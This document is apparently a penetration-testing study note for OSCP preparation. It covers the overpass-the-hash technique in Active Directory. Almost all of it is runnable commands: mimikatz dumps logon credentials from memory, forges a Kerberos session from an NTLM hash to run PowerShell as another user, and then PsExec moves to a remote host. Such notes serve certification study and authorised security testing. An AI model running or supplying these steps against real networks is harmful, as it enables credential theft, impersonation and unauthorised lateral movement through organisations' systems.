// notes/ Active Directory
🏛️
Lateral Movement Overpass The Hash
Create Kerberos tickets using a users NTLM hash and mimikatz
#active directory#adot8
source · oscp.adot8.com · active-directory/lateral-movement_overpass-the-hash ↗Overpass the Hash
Create Kerberos tickets using a users NTLM hash and mimikatz
Local
Obtain hash
code
01privilege::debug02sekurlsa::logonpasswordsRequest ticket
code
01sekurlsa::pth /user:adot /domain:adot.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershellPowershell will start as the new user. Test by using a restricted resource and viewing TGT's
code
01net use \\restricted0102klistCan use PsExec to move laterally
code
01.\PsExec.exe \\web04 cmd